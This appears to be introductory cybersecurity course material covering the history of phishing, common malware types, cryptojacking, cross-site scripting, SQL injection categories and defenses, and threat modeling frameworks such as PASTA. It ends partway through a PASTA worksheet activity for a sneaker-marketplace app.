The origins of phishing
Phishing has been around since the early days of the internet. It can be traced back to the 1990s. At the
time, people across the world were coming online for the first time. As the internet became more
accessible it began to attract the attention of malicious actors. These malicious actors realized that the
internet gave them a level of anonymity to commit their crimes.
Early persuasion tactics
One of the earliest instances of phishing was aimed at a popular chat service called AOL Instant
Messenger (AIM). Users of the service began receiving emails asking them to verify their accounts or
provide personal billing information. The users were unaware that these messages were sent by
malicious actors pretending to be service providers.
This was one of the first examples of mass phishing, which describes attacks that send malicious emails
out to a large number of people, increasing the likelihood of baiting someone into the trap.
During the AIM attacks, malicious actors carefully crafted emails that appeared to come directly from
AOL. The messages used official logos, colors, and fonts to trick unsuspecting users into sharing their
information and account details.
Attackers used the stolen information to create fraudulent AOL accounts they could use to carry out
other crimes anonymously. AOL was forced to adapt their security policies to address these threats. The
chat service began including messages on their platforms to warn users about phishing attacks.
How phishing has evolved
Phishing continued evolving at the turn of the century as businesses and newer technologies began
entering the digital landscape. In the early 2000s, e-commerce and online payment systems started to
become popular alternatives to traditional marketplaces. The introduction of online transactions
presented new opportunities for attackers to commit crimes.
A number of techniques began to appear around this time period, many of which are still used today.
There are five common types of phishing that every security analyst should know:
●
●
●
●
●
Email phishing is a type of attack sent via email in which threat actors send messages pretending
to be a trusted person or entity.
Smishing is a type of phishing that uses Short Message Service (SMS), a technology that powers
text messaging. Smishing covers all forms of text messaging services, including Apple’s
iMessages, WhatsApp, and other chat mediums on phones.
Vishing refers to the use of voice calls or voice messages to trick targets into providing personal
information over the phone.
Spear phishing is a subset of email phishing in which specific people are purposefully targeted,
such as the accountants of a small business.
Whaling refers to a category of spear phishing attempts that are aimed at high-ranking
executives in an organization.
Since the early days of phishing, email attacks remain the most common types that are used. While they
were originally used to trick people into sharing access credentials and credit card information, email
phishing became a popular method to infect computer systems and networks with malicious software.
In late 2003, attackers around the world created fraudulent websites that resembled businesses like
eBay and PayPal™. Mass phishing campaigns to distribute malicious programs were also launched
against e-commerce and banking sites.
Recent trends
Starting in the 2010s, attackers began to shift away from mass phishing attempts that relied on baiting
unsuspecting people into a trap. Leveraging new technologies, criminals began carrying out what’s
known as targeted phishing attempts. Targeted phishing describes attacks that are sent to specific
targets using highly customized methods to create a strong sense of familiarity.
A type of targeted phishing that evolved in the 2010s is angler phishing. Angler phishing is a technique
where attackers impersonate customer service representatives on social media. This tactic evolved from
people’s tendency to complain about businesses online. Threat actors intercept complaints from places
like message boards or comment sections and contact the angry customer via social media. Like the AIM
attacks of the 1990s, they use fraudulent accounts that appear similar to those of actual businesses.
They then trick the angry customers into sharing sensitive information with the promise of fixing their
problem.
Key takeaways
Phishing tactics have become very sophisticated over the years. Unfortunately, there isn't a perfect
solution that prevents these attacks from happening. Tactics, like email phishing that started in the last
century, remain an effective and profitable method of attack for criminals online today.
There isn’t a technological solution to prevent phishing entirely. However, there are many ways to
reduce the damage from these attacks when they happen. One way is to spread awareness and inform
others. As a security professional, you may be responsible for helping others identify forms of social
engineering, like phishing. For example, you might create training programs that educate employees
about topics like phishing. Sharing your knowledge with others is an important responsibility that helps
build a culture of security.
Resources for more information
Staying up-to-date on phishing threats is one of the best things you can do to educate yourself and help
your organization make smarter security decisions.
●
●
●
Google’s phishing quiz is a tool that you can use or share that illustrates just how difficult it can
be to identify these attacks.
Phishing.org reports on the latest phishing trends and shares free resources that can help
reduce phishing attacks.
The Anti-Phishing Working Group (APWG) is a non-profit group of multidisciplinary security
experts that publishes a quarterly report on phishing trends.
Malicious Software
People and computers are very different from one another. There's one way that we're alike. You
know how? We're both vulnerable to getting an infection. While humans can be
infected by a virus that causes a cold or flu, computers can be infected by malware. Malware is
software designed to harm devices or networks. Malware, which is short for malicious software,
can be spread in many ways. For example, it can be spread through an infected USB drive. Or also
commonly spread between computers online. Devices and systems that are connected to the
internet are especially vulnerable to infection. When a device becomes infected, malware interferes
with its normal operations. Attackers use malware to take control of the infected system without
the user's knowledge or permission. Malware has been a threat to people and organizations for a
long time. Attackers have created many different strains of malware. They all vary in how they're
spread. Five of the most common types of malware are a virus, worm, trojan, ransomware, and
spyware. Let's take a look at how each of them work. A virus is malicious code written to interfere
with computer operations and cause damage to data and software. Viruses typically hide inside of
trusted applications. When the infected program is launched, the virus clones itself and spreads to
other files on the device. An important characteristic of viruses is that they must be activated by the
user to start the infection. The next kind of malware doesn't have this limitation. A worm is
malware that can duplicate and spread itself across systems on its own. While viruses require users
to perform an action like opening a file to duplicate, worms use an infected device as a host. They
scan the connected network for other devices. Worms then infect everything on the network
without requiring an action to trigger the spread. Viruses and worms are delivered through
phishing emails and other methods before they infect a device. Making sure you click links only
from trusted sources is one way to avoid these types of infection. However, attackers have designed
another form of malware that can get past this precaution. A trojan, or Trojan horse, is malware
that looks like a legitimate file or program. The name is a reference to an ancient Greek legend
that's set in the city of Troy. In Troy, a group of soldiers hid inside a giant wooden horse that was
presented as a gift to their enemies. It was accepted and brought inside the city walls. Later that
evening, the soldiers inside of the horse climbed out and attacked the city. Like this ancient tale,
attackers design trojans to appear harmless. This type of malware is typically disguised as files or
useful applications to trick their target into installing them. Attackers often use trojans to gain
access and install another kind of malware called ransomware. Ransomware is a type of malicious
attack where attackers encrypt an organization's data and demand payment to restore access.
These kind of attacks have become very common these days. A unique feature of ransomware
attacks is that they make themselves known to their targets. Without doing this, they couldn't
collect the money they demand. Normally, they decrypt the hidden data as soon as the sum
of money is paid. Unfortunately, there's no guarantee they won't return to demand more. The last
type of malware I want to mention is spyware. Spyware is malware that's used to gather and sell
information without consent. Consent is a keyword in this case. Organizations also collect
information about their customers, like their browsing habits and purchase history. However, they
always give their customers the ability to opt out. Cybercriminals, on the other hand, use spyware
to steal information. They use spyware attacks to collect data like login credentials, account PINs,
and other types of sensitive information for their own personal gain. There are many other types of
malware besides these and new forms are always evolving. They all pose a serious risk to
individuals and organizations. Next time, we'll explore how security teams detect and remove these
kinds of threats.
An introduction to malware
Previously, you learned that malware is software designed to harm devices or networks. Since its first
appearance on personal computers decades ago, malware has developed into a variety of strains. Being
able to identify different types of malware and understand the ways in which they are spread will help
you stay alert and be informed as a security professional.
Virus
A virus is malicious code written to interfere with computer operations and cause damage to data and
software. This type of malware must be installed by the target user before it can spread itself and cause
damage. One of the many ways that viruses are spread is through phishing campaigns where malicious
links are hidden within links or attachments.
Worm
A worm is malware that can duplicate and spread itself across systems on its own. Similar to a virus, a
worm must be installed by the target user and can also be spread with tactics like malicious email. Given
a worm's ability to spread on its own, attackers sometimes target devices, drives, or files that have
shared access over a network.
A well known example is the Blaster worm, also known as Lovesan, Lovsan, or MSBlast. In the early
2000s, this worm spread itself on computers running Windows XP and Windows 2000 operating
systems. It would force devices into a continuous loop of shutting down and restarting. Although it did
not damage the infected devices, it was able to spread itself to hundreds of thousands of users around
the world. Many variants of the Blaster worm have been deployed since the original and can infect
modern computers.
Note: Worms were very popular attacks in the mid 2000s but are less frequently used in recent years.
Trojan
A trojan, also called a Trojan horse, is malware that looks like a legitimate file or program. This
characteristic relates to how trojans are spread. Similar to viruses, attackers deliver this type of malware
hidden in file and application downloads. Attackers rely on tricking unsuspecting users into believing
they’re downloading a harmless file, when they’re actually infecting their own device with malware that
can be used to spy on them, grant access to other devices, and more.
Adware
Advertising-supported software, or adware, is a type of legitimate software that is sometimes used to
display digital advertisements in applications. Software developers often use adware as a way to lower
their production costs or to make their products free to the public—also known as freeware or
shareware. In these instances, developers monetize their product through ad revenue rather than at the
expense of their users.
Malicious adware falls into a sub-category of malware known as a potentially unwanted application
(PUA). A PUA is a type of unwanted software that is bundled in with legitimate programs which might
display ads, cause device slowdown, or install other software. Attackers sometimes hide this type of
malware in freeware with insecure design to monetize ads for themselves instead of the developer. This
works even when the user has declined to receive ads.
Spyware
Spyware is malware that's used to gather and sell information without consent. It's also considered a
PUA. Spyware is commonly hidden in bundleware, additional software that is sometimes packaged with
other applications. PUAs like spyware have become a serious challenge in the open-source software
development ecosystem. That’s because developers tend to overlook how their software could be
misused or abused by others.
Scareware
Another type of PUA is scareware. This type of malware employs tactics to frighten users into infecting
their own device. Scareware tricks users by displaying fake warnings that appear to come from
legitimate companies. Email and pop-ups are just a couple of ways scareware is spread. Both can be
used to deliver phony warnings with false claims about the user's files or data being at risk.
Fileless malware
Fileless malware does not need to be installed by the user because it uses legitimate programs that are
already installed to infect a computer. This type of infection resides in memory where the malware
never touches the hard drive. This is unlike the other types of malware, which are stored within a file on
disk. Instead, these stealthy infections get into the operating system or hide within trusted applications.
Pro tip: Fileless malware is detected by performing memory analysis, which requires experience with
operating systems.
Rootkits
A rootkit is malware that provides remote, administrative access to a computer. Most attackers use
rootkits to open a backdoor to systems, allowing them to install other forms of malware or to conduct
network security attacks.
This kind of malware is often spread by a combination of two components: a dropper and a loader. A
dropper is a type of malware that comes packed with malicious code which is delivered and installed
onto a target system. For example, a dropper is often disguised as a legitimate file, such as a document,
an image, or an executable to deceive its target into opening, or dropping it, onto their device. If the user
opens the dropper program, its malicious code is executed and it hides itself on the target system.
Multi-staged malware attacks, where multiple packets of malicious code are deployed, commonly use a
variation called a loader. A loader is a type of malware that downloads strains of malicious code from an
external source and installs them onto a target system. Attackers might use loaders for different
purposes, such as to set up another type of malware---a botnet.
Botnet
A botnet, short for “robot network,” is a collection of computers infected by malware that are under the
control of a single threat actor, known as the “bot-herder.” Viruses, worms, and trojans are often used to
spread the initial infection and turn the devices into a bot for the bot-herder. The attacker then uses file
sharing, email, or social media application protocols to create new bots and grow the botnet. When a
target unknowingly opens the malicious file, the computer, or bot, reports the information back to the
bot-herder, who can execute commands on the infected computer.
Ransomware
Ransomware describes a malicious attack where threat actors encrypt an organization's data and
demand payment to restore access. According to the Cybersecurity and Infrastructure Security Agency
(CISA), ransomware crimes are on the rise and becoming increasingly sophisticated. Ransomware
infections can cause significant damage to an organization and its customers. An example is the
WannaCry attack that encrypts a victim's computer until a ransom payment of cryptocurrency is paid.
Key takeaways
The variety of malware is astounding. The number of ways that it’s spread is even more staggering.
Malware is a complex threat that can require its own specialization in cybersecurity. One place to learn
more about malware analysis is INFOSEC's introductory course on malware analysis. Even without
specializing in malware analysis, recognizing the types of malware and how they’re spread is an
important part of defending against these attacks as a security analyst.
The Rise of Cryptojacking
Malware has been around nearly as long as computers. In its earliest forms, it was used by
troublemakers as a form of digital vandalism. In today's digital world, malware has become
a profitable crime that attackers use for
their own financial gain. As a security professional, it's important that you remain aware of the
latest evolutions. Let's take a closer look at
one way malware has evolved. We'll then use this example to consider how malware can be spotted
and how you can proactively protect
against malware. Ransomware is one of the types of malware attackers use to steal money. Another
more recent type of malware is cryptojacking. Cryptojacking is a form
of malware that installs software to illegally mine cryptocurrencies. You may be familiar with
cryptocurrency from the news. If you're new to the topic, cryptocurrencies are a form
of digital money that have real-world value. Like physical forms of currency, there are many
different types. For the most part, they're referred to as coins or tokens. In simple terms, crypto
mining is a process used to obtain new coins. Crypto mining is similar to the process for mining for
other resources, like gold. Mining for something like gold involves machinery, such as trucks and
bulldozers, that can dig through the Earth. Crypto coins, on the other hand, use computers instead.
Rather than digging through the Earth, the computers run software that dig through billions of lines
of encrypted code. When enough code is processed, a crypto coin can be found. Generally, more
computers mining for coins mean more cryptocurrency can be discovered. Criminals unfortunately
figured this out. Beginning in 2017, cryptojacking malware started being used to gain unauthorized
control of personal computers to mine cryptocurrency. Since that time, cryptojacking techniques
have become more sophisticated. Criminals now regularly target vulnerable servers to spread their
mining software. Devices that communicate with the infected server become infected themselves.
The malicious code then runs in the background, mining for coins unknown to anyone.
Cryptojacking software is hard to detect. Luckily, security professionals have sophisticated tools
that can help. An intrusion detection system, or IDS, is an application that monitors system activity
and alerts some possible intrusions. When abnormal activity is detected like, malware mining for
coins, the IDS alerts security personnel. Despite their usefulness, detection systems have a major
drawback. New forms of malware can remain undetected. Fortunately, there are subtle signs that
indicate a device is infected with cryptojacking software or other forms of malware. By far the most
telling sign of a cryptojacking infection is slowdown. Other signs include increased CPU usage,
sudden system crashes, and fast draining batteries. Another sign is unusually high electricity costs
related to the resource- intensive process of crypto mining. It's also good to know that there are
certain measures you can take to reduce the likelihood of experiencing a malware attack like
cryptojacking. These defenses include things like using browser extensions designed to block
malware, using ad blockers, disabling JavaScript, and staying alert on the latest trends. Security
analysts can
also educate others in their organizations on malware attacks. While cryptojacking is still relatively
new, attacks are becoming more common. The type of malicious code cybercriminals spread is
continually evolving. It takes many years of experience to analyze new forms of malware.
Nevertheless, you're well on your way towards helping defend against these threats.
Cross-site Scripting (XSS)
Previously, we explored a few types of malware. Whether it's installed on an individual computer or
a network server, all malicious software needs to be delivered to the target before it can work.
Phishing and other social engineering techniques are common ways for malware to be delivered.
Another way it's spread is using a broad class of threats known as web based exploits. Web-based
exploits are malicious code or behavior that's used to take advantage of coding flaws in a web
application. Cybercriminals target web-based exploits to obtain sensitive personal information.
Attacks occur because web applications interact with multiple users across multiple networks.
Malicious hackers commonly exploit this high level of interaction using injection attacks. An
injection attack is malicious code inserted into a vulnerable application. The infected application
often appears to work normally. That's because the injected code runs in the background, unknown
to the user. Applications are vulnerable to injection attacks because they are programmed to
receive data inputs. This could be something the user types, clicks, or something one program is
sharing with another. When coded correctly, applications should be able to interpret and handle
user inputs. For example, let's say an application is expecting the user to enter a phone number.
This application should validate the input from the user to make sure the data is all numbers and
not more than ten digits. If the input from the user doesn't meet these requirements, the application
should know how to handle it. Web apps interact with multiple users across many platforms. They
also have a lot of interactive objects like images and buttons. This makes it challenging for
developers to think of all the ways they should sanitize their input. A common and dangerous type
of injection attack that's a threat to web apps is cross-site scripting. Cross site scripting, or XSS, is an
injection attack that inserts code into a vulnerable website or web application. These attacks are
often delivered by exploiting the two languages used by most websites, HTML and JavaScript. Both
can give cybercriminals access to everything that loads on the infected web page. This can include
session cookies, geolocation, and even webcams and microphones. There are three main types of
cross-site scripting attacks reflected, stored, and DOM-based. A reflected XSS attack is an instance
where a malicious script is sent to the server and activated during the server's response. A common
example of this is the search bar of a website. In a reflected XSS attack, criminals send their target a
web link that appears to go to a trusted site. When they click the link, it sends a HTTP request to the
vulnerable site server. The attacker script is then returned or reflected back to the innocent user's
browser. Here, the browser loads the malicious script because it trusts the server's response. With
the script loaded, information like session cookies are sent back to the attacker. In a stored XSS
attack, the malicious script isn't hidden in a link that needs to be sent to the server. Instead a stored
XSS attack is an instance when malicious script is injected directly on the server. Here, attackers
target elements of a site that are served to the user. This could be things like images and buttons
that load when the site is visited. Infected elements activate the malicious code when a user simply
visits the site. Stored XSS attacks can be damaging because the user has no way of knowing the site
is infected beforehand. Finally there's DOM-based XSS. DOM stands for Document Object Model,
which is basically the source code of a website. A DOM-based XSS attack is an instance when
malicious script exists in the web page a browser loads. Unlike reflected XSS, these attacks don't
need to be sent to the server to activate. In a DOM-based attack, a malicious script can be seen in the
URL. In this example, the website's URL contains parameter values. The parameter values reflect
input from the user. Here, the site allows users to select color themes. When the user makes a
selection, it appears as part of the URL. In a DOM-based attack, criminals change the parameter that
suspecting an input. For example, they could hide malicious JavaScript in the HTML tags. The
browser would process the HTML and execute the JavaScript. Hackers use these methods of crosssite scripting to steal sensitive information. Security analysts should be familiar with this group of
injection attacks.
Exploitable gaps in databases
Let's keep exploring injection and attacks by investigating another common type of web based
exploit. The next one we're going to discuss exploits the way websites access information from
databases. Early in the program, you may have learned about SQL. You may recall, SQL is a
programming language used to create, interact with, and request information from a database. SQL
is used by most web applications. For example, shopping websites use it a lot. Imagine the
databases of an online clothing store It likely contains a full inventory of all the items the company
sells. Websites don't normally make users enter the SQL queries manually. Instead, they use things
like menus, images, and buttons to show users information in a meaningful way. For example, when
an online shopper clicks a button to add a sweater to their cart, it triggers a SQL query. The query
runs in the background where no one can see it. You'd never know from using the menus and
buttons of a website, but sometimes those back inquiries are vulnerable to injection attacks. A SQL
injection is an attack that executes unexpected queries on a database. Like cross-site scripting, SQL
injection occurs due to a lack of sanitized input. The injections take place in the area of the website
that are designed to accept user input. A common example
is the login form to access a site. One of these forms might trigger a backend SQL statement like this
when a user enters their credentials. Web forms, like this one, are designed to copy user input into
the statement exactly as they're written. The statement then sends a request to the server, which
runs the query. Websites that are vulnerable to SQL injection insert the user's input exactly as it's
entered before running the code. Unfortunately, this is a serious design flaw. It commonly happens
because web developers expect people to use these inputs correctly. They don't anticipate attackers
exploiting them. For example, an attacker might insert additional SQL code. This could cause the
server to run a harmful query of code that it wasn't expecting. Malicious hackers can target these
attack vectors to obtain sensitive information, modify tables and even gain administrative rights to
the database. The best way to defend against SQL
injection is code that will sanitize the input. Developers can write code to search for specific SQL
characters. This gives the server a clearer idea of what inputs to expect. One way this is done is with
prepared statements. A prepared statement is a coding technique that executes SQL statements
before passing them on to the database. When the user's input is unknown, the best practice is to
use these prepared statements. With just a few extra lines of code, a prepared statement executes
the code before passing it on to the server. This means the code can be validated before performing
the query. Having well written code is one of
the keys to preventing SQL injection. Security teams work with program developers to test
applications for these sorts of vulnerabilities. Like a lot of security tasks, it's a team effort. Injection
attacks are just one of many types of web-based exploits that security teams deal with. We're going
to explore how security teams prepare for injection attacks and other kinds of threats.
Prevent injection attacks
Previously, you learned that Structured Query Language (SQL) is a programming language used to
create, interact with, and request information from a database. SQL is one of the most common
programming languages used to interact with databases because it is widely supported by a range of
database products.
As you might recall, malicious SQL injection is a type of attack that executes unexpected queries on a
database. Threat actors perform SQL injections to modify, delete, or steal information from databases. A
SQL injection is a common attack vector that is used to gain unauthorized access to web applications.
Due to the language's popularity with developers, SQL injections are regularly listed in the OWASP®
Top 10 because developers tend to focus on making their applications work correctly rather than
protecting their products from injection.
In this reading, you'll learn about SQL queries and how they are used to request information from a
database. You will also learn about the three classes of SQL injection attacks used to manipulate
vulnerable queries. You will also learn ways to identify when websites are vulnerable and ways to
address those gaps.
SQL queries
Every bit of information that’s accessed online is stored in a database. A database is an organized
collection of information or data in one place. A database can include data such as an organization's
employee directory or customer payment methods. In SQL, database information is organized in tables.
SQL is commonly used for retrieving, inserting, updating, or deleting information in tables using queries.
A SQL query is a request for data from a database. For example, a SQL query can request data from an
organization's employee directory such as employee IDs, names, and job titles. A human resources
application can accept an input that queries a SQL table to filter the data and locate a specific person.
SQL injections can occur anywhere within a vulnerable application that can accept a SQL query.
Queries are usually initiated in places where users can input information into an application or a
website via an input field. Input fields include features that accept text input such as login forms, search
bars, or comment submission boxes. A SQL injection occurs when an attacker exploits input fields that
aren't programmed to filter out unwanted text. SQL injections can be used to manipulate databases, steal
sensitive data, or even take control of vulnerable applications.
SQL injection categories
There are three main categories of SQL injection:
●
●
●
In-band
Out-of-band
Inferential
In the following sections, you'll learn that each type describes how a SQL injection is initiated and how it
returns the results of the attack.
In-band SQL injection
In-band, or classic, SQL injection is the most common type. An in-band injection is one that uses the
same communication channel to launch the attack and gather the results.
For example, this might occur in the search box of a retailer's website that lets customers find products
to buy. If the search box is vulnerable to injection, an attacker could enter a malicious query that would
be executed in the database, causing it to return sensitive information like user passwords. The data
that's returned is displayed back in the search box where the attack was initiated.
Out-of-band SQL injection
An out-of-band injection is one that uses a different communication channel to launch the attack and
gather the results.
For example, an attacker could use a malicious query to create a connection between a vulnerable
website and a database they control. This separate channel would allow them to bypass any security
controls that are in place on the website's server, allowing them to steal sensitive data
Note: Out-of-band injection attacks are very uncommon because they'll only work when certain features
are enabled on the target server.
Inferential SQL injection
Inferential SQL injection occurs when an attacker is unable to directly see the results of their attack.
Instead, they can interpret the results by analyzing the behavior of the system.
For example, an attacker might perform a SQL injection attack on the login form of a website that causes
the system to respond with an error message. Although sensitive data is not returned, the attacker can
figure out the database's structure based on the error. They can then use this information to craft
attacks that will give them access to sensitive data or to take control of the system.
Injection Prevention
SQL queries are often programmed with the assumption that users will only input relevant information.
For example, a login form that expects users to input their email address assumes the input will be
formatted a certain way, such as jdoe@domain.com. Unfortunately, this isn’t always the case.
A key to preventing SQL injection attacks is to escape user inputs—preventing someone from inserting
any code that a program isn't expecting.
There are several ways to escape user inputs:
●
●
●
Prepared statements: a coding technique that executes SQL statements before passing them on
to a database
Input sanitization: programming that removes user input which could be interpreted as code.
Input validation: programming that ensures user input meets a system's expectations.
Using a combination of these techniques can help prevent SQL injection attacks. In the security field, you
might need to work closely with application developers to address vulnerabilities that can lead to SQL
injections. OWASP's SQL injection detection techniques is a useful resource if you're interested in
investigating SQL injection vulnerabilities on your own.
Key takeaways
Many web applications retrieve data from databases using SQL, and injection attacks are quite common
due to the popularity of the language. As is the case with other kinds of injection attacks, SQL injections
are a result of unexpected user input. It's important to collaborate with app developers to help prevent
these kinds of attacks by sharing your understanding of SQL injection techniques and the defenses that
should be put in place.
A proactive approach to security
Preparing for attacks is an important job that the entire security team is responsible for. Threat
actors have many tools they can use depending on their target. For example, attacking a small
business can be different from attacking a public utility. Each have different assets and
specific defenses to keep them safe. In all cases, anticipating attacks is the key to preparing for
them. In security, we do that by performing an activity known as threat modeling. Threat modeling
is a process of identifying assets, their vulnerabilities, and how each is exposed to threats. We apply
threat modeling to everything we protect. Entire systems, applications, or business processes all get
examined from this security-related perspective. Creating threat models is a lengthy and detailed
activity. They're normally performed by a collection of individuals with years of experience in the
field. Because of that, it's considered to be an advanced skill in security. However, that doesn't mean
you won't be involved. There are several threat modeling frameworks used in the field. Some are
better suited for network security. Others are better for things like information security, or
application development. In general,
there are six steps of a threat model. The first is to define the scope of the model. At this stage, the
team determines what they're building by creating an inventory of assets and classifying them. The
second step is to identify threats. Here, the team defines all potential threat actors. A threat actor is
any person or group who presents a security risk. Threat actors are characterized as being internal
or external. For example, an internal threat actor could be an employee who intentionally expose an
asset to harm. An example of an external threat actor could be a malicious hacker, or a competing
business. After threat actors have been identified, the team puts together what's known as an attack
tree. An attack tree is a diagram that maps threats to assets. The team tries to be as detailed as
possible when constructing this diagram before moving on. Step three of the threat modeling
process is to characterize the environment. Here, the team applies an attacker mindset to the
business. They consider how the customers and employees interact with the environment. Other
factors they consider are external partners and third party vendors. At step four, their objective is to
analyze threats. Here, the team works together to examine existing protections and identify gaps.
They then rank threats according to their risk score that they assign. During step five, the team
decides how to mitigate risk. At this point, the group creates their plan for defending against threats.
The choices here are to avoid risk, transfer it, reduce it, or accept it. The sixth and final step is to
evaluate findings. At this stage, everything that was done during the exercise is documented, fixes
are applied, and the team makes note of any successes they had. They also record any lessons
learned, so they can inform how they approach future threat models. That's an overview of the
general threat modeling process.
PASTA: The Process for Attack Simulation and
Threat Analysis
Let's finish exploring threat modeling by taking a look at real-world scenarios. This time, we'll use a
standard threat modeling process called PASTA. Imagine that a fitness company is getting ready to
launch their first mobile app. Before we can go live, the company asks their security team to ensure
the app will protect customer data. The team decides to perform a threat model using the PASTA
framework. PASTA is a popular threat modeling
framework that's used across many industries. PASTA is short for Process for
Attack Simulation and Threat Analysis. There are seven stages
of the PASTA framework. Let's go through each of them to help
this fitness company get their app ready. Stage one of the PASTA threat model
framework is to define business and security objectives. Before starting the threat model, the team
needs to decide what their goals are. The main objective in our example with the fitness company
app is protecting customer data. The team starts by asking a lot of questions at this stage. They'll
need to understand things like how personally identifiable information is handled. Answering these
questions is a key to evaluate the impact of threats that they'll find along the way. Stage two of the
PASTA framework is to define the technical scope. Here, the team's focus is to identify the
application components that must be evaluated. This is what we discussed earlier as the attack
surface. For a mobile app, this will include technology that's
involved while data is at rest and in use. This includes network protocols, security controls, and
other data interactions. At stage three of PASTA, the team's job is to decompose the application. In
other words, we need to identify the existing controls that will protect user data from threats. This
normally means working with the application developers to produce a data flow diagram. A
diagram like this will show how data gets from a user's device to the company's database. It would
also identify the controls in place to protect this data along the way. Stage four of PASTA is next. The
focus here is to perform a threat analysis. This is where the team gets into their attacker mindset.
Here, research is done to collect the most up-to-date information on the type of attacks being used.
Like other technologies, mobile apps have many attack vectors. These change regularly, so the team
would reference resources to stay up-to-date. Stage five of PASTA is performing a vulnerability
analysis. In this stage, the team more deeply investigates potential vulnerabilities by considering
the root of the problem. Next is stage six of PASTA, where the team conducts attack modeling. This is
where the team tests the vulnerabilities that were analyzed in stage five by simulating attacks. The
team does this by creating an attack tree, which looks like a flow chart. For example, an attack tree
for
our mobile app might look like this. Customer information, like user names and passwords, is a
target. This data is normally stored in a database. We've learned that databases are vulnerable to
attacks like SQL injection. So we will add this attack vector to our attack tree. A threat actor might
exploit vulnerabilities caused by unsanitized inputs to attack this vector. The security team uses
attack trees like this to identify attack vectors that need to be tested to validate threats. This is just
one branch of this attack tree. An application, like a fitness app, typically has lots of branches with a
number of other attack vectors. Stage seven of PASTA is to analyze risk and impact. Here, the team
assembles all the information they've collected in stages one through six. By this stage, the team is
in position to make informed risk management recommendations to business stakeholders that
align with their goals. And with that, we made it all the way
through a threat modeling exercise based on the PASTA framework!
Traits of an effective threat model
Threat modeling is the process of identifying assets, their vulnerabilities, and how each is exposed to
threats. It is a strategic approach that combines various security activities, such as vulnerability
management, threat analysis, and incident response. Security teams commonly perform these exercises
to ensure their systems are adequately protected. Another use of threat modeling is to proactively find
ways of reducing risks to any system or business process.
Traditionally, threat modeling is associated with the field of application development. In this reading,
you will learn about common threat modeling frameworks that are used to design software that can
withstand attacks. You'll also learn about the growing need for application security and ways that you
can participate.
Why application security matters
Applications have become an essential part of many organizations' success. For example, web-based
applications allow customers from anywhere in the world to connect with businesses, their partners,
and other customers.
Mobile applications have also changed the way people access the digital world. Smartphones are often
the main way that data is exchanged between users and a business. The volume of data being processed
by applications makes securing them a key to reducing risk for everyone who’s connected.
For example, say an application uses Java-based logging libraries with the Log4Shell vulnerability (CVE2021-44228). If it's not patched, this vulnerability can allow remote code execution that an attacker can
use to gain full access to your system from anywhere in the world. If exploited, a critical vulnerability
like this can impact millions of devices.
Defending the application layer
Defending the application layer requires proper testing to uncover weaknesses that can lead to risk.
Threat modeling is one of the primary ways to ensure that an application meets security requirements.
A DevSecOps team, which stands for development, security, and operations, usually performs these
analyses.
A typical threat modeling process is performed in a cycle:
●
●
●
●
●
●
Define the scope
Identify threats
Characterize the environment
Analyze threats
Mitigate risks
Evaluate findings
Ideally, threat modeling should be performed before, during, and after an application is developed.
However, conducting a thorough software analysis takes time and resources. Everything from the
application's architecture to its business purposes should be evaluated. As a result, a number of threatmodeling frameworks have been developed over the years to make the process smoother.
Note: Threat modeling should be incorporated at every stage of the software development lifecycle, or
SDLC.
Common frameworks
When performing threat modeling, there are multiple methods that can be used, such as:
●
●
●
●
STRIDE
PASTA
Trike
VAST
Organizations might use any one of these to gather intelligence and make decisions to improve their
security posture. Ultimately, the “right” model depends on the situation and the types of risks an
application might face.
STRIDE
STRIDE is a threat-modeling framework developed by Microsoft. It’s commonly used to identify
vulnerabilities in six specific attack vectors. The acronym represents each of these vectors: spoofing,
tampering, repudiation, information disclosure, denial of service, and elevation of privilege.
PASTA
The Process of Attack Simulation and Threat Analysis (PASTA) is a risk-centric threat modeling process
developed by two OWASP leaders and supported by a cybersecurity firm called VerSprite. Its main focus
is to discover evidence of viable threats and represent this information as a model. PASTA's evidencebased design can be applied when threat modeling an application or the environment that supports that
application. Its seven stage process consists of various activities that incorporate relevant security
artifacts of the environment, like vulnerability assessment reports.
Trike
Trike is an open source methodology and tool that takes a security-centric approach to threat modeling.
It's commonly used to focus on security permissions, application use cases, privilege models, and other
elements that support a secure environment.
VAST
The Visual, Agile, and Simple Threat (VAST) Modeling framework is part of an automated threatmodeling platform called ThreatModeler®. Many security teams opt to use VAST as a way of automating
and streamlining their threat modeling assessments.
Participating in threat modeling
Threat modeling is often performed by experienced security professionals, but it’s almost never done
alone. This is especially true when it comes to securing applications. Programs are complex systems
responsible for handling a lot of data and processing a variety of commands from users and other
systems.
One of the keys to threat modeling is asking the right questions:
●
●
●
●
●
What are we working on?
What kinds of things can go wrong?
What are we doing about it?
Have we addressed everything?
Did we do a good job?
It takes time and practice to learn how to work with things like data flow diagrams and attack trees.
However, anyone can learn to be an effective threat modeler. Regardless of your level of experience,
participating in one of these exercises always starts with simply asking the right questions.
Key takeaways
Many people rely on software applications in their day to day lives. Securing the applications that people
use has never been more important. Threat modeling is one of the main ways to determine whether
security controls are in place to protect data privacy. Building the skills required to lead a threat
modeling activity is a matter of practice. However, even a security analyst with little experience can be a
valuable contributor to the process. It all starts with applying an attacker mindset and thinking critically
about how data is handled.
Activity: Apply the PASTA threat model framework
Activity Overview
In this activity, you will practice using the Process of Attack Simulation and Threat Analysis
(PASTA) threat model framework. You will determine whether a new shopping app is safe
to launch.
Threat modeling is an important part of secure software development. Security teams
typically perform threat models to identify vulnerabilities before malicious actors do.
PASTA is a commonly used framework for assessing the risk profile of new applications.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You’re part of the growing security team at a company for sneaker enthusiasts and
collectors. The business is preparing to launch a mobile app that makes it easy for their
customers to buy and sell shoes.
You are performing a threat model of the application using the PASTA framework. You will
go through each of the seven stages of the framework to identify security requirements for
the new sneaker company app.
Part 2 - Complete the PASTA stages
Step 1: Identify the mobile app’s business objectives
The main goal of Stage I of the PASTA framework is to understand why the application was developed
and what it is expected to do.
Note: Stage I typically requires gathering input from many individuals at a business.
First, review the following description of why the sneaker company decided to develop this new app:
Description: Our application should seamlessly connect sellers and shoppers. It should be easy for users
to sign-up, log in, and manage their accounts. Data privacy is a big concern for us. We want users to feel
confident that we’re being responsible with their information.
Buyers should be able to directly message sellers with questions. They should also have the ability to
rate sellers to encourage good service. Sales should be clear and quick to process. Users should have
several payment options for a smooth checkout process. Proper payment handling is really important
because we want to avoid legal issues.
In the Stage 1 row of the PASTA worksheet, make 2-3 notes of business objectives that you’ve identified
from the description.
In Stage II, the technological scope of the project is defined. Normally, the application development team
is involved in this stage because they have the most knowledge about the code base and application
logic. Your responsibility as a security professional would be to evaluate the application's architecture
for security risks.
For example, the app will be exchanging and storing a lot of user data. These are some of the
